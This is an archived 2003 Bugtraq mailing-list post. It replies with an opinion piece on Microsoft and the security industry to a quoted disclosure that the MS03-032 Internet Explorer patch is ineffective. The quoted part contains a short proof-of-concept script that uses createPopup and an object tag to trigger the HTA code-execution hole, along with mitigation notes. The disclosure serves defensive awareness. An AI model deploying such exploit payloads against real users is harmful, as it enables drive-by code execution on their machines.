[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <3F5CEDD7.4040305@gs2.com.br>
From: bugtraq at gs2.com.br (Fabio Gomes de Souza)
Subject: BAD NEWS: Microsoft Security Bulletin MS03-032
Guys,
If Microsoft fixed IE holes, they would destroy the Adware/Spyware industry.
If Microsoft removed the Virus Support (TM) from their products, they
would crash the entire antivirus industry (and this one is not small).
If Microsoft did a decent hotfix management solution, they would destroy
the newly-created hotfix management industry.
If Microsoft managed the open ports of a Windows computer in a decent
manner, Symantec, their friend who sells firewalls, would earn less money.
This list is endless. Too many cats to put in a bag.
Also endless is this issue. Market is the answer. When the market
finally realize that AT LEAST the OS must be Open Source, these problems
will disappear.
http-equiv@...ite.com escreveu:
> Since the cat somehow got out of the bag, and more importantly, this
> is so blatantly obvious, herewith is the "Bad News":
>
> The patch for Drew's object data=funky.hta doesn't work:
>
> http://www.malware.com/badnews.html
>
> <script>
> var oPopup = window.createPopup();
>
> function showPopup() {
> oPopup.document.body.innerHTML = "<object data=ouch.php>";
> oPopup.show(0,0,1,1,document.body);
> }
>
> showPopup()
> </script>
>
> Notes:
>
> 1. Disable Active Scripting
> 2. In case that does not work, uninstall Internet Explorer
> 3. http://www.eeye.com/html/Research/Advisories/AD20030820.html
> 4. This was sent to the manufacturer quite some time prior to this
> going out. Surprisingly no immediate acknowledgement
> 5. This is so blatantly obvious, in particular because it is
> the coupling of two known issues[one current + one from 2002]:
>
> http://www.securityfocus.com/bid/3867/
>
> It is beyond comprehension why this was not checked from the
> outset as it is a known issue plus file://::{CLSID}in the control
> panel in the object tag still functions to date.
> 6. At this stage one must really question the compentency of this
> particular operation. This is a pathetic oversight.
>
Powered by blists - more mailing lists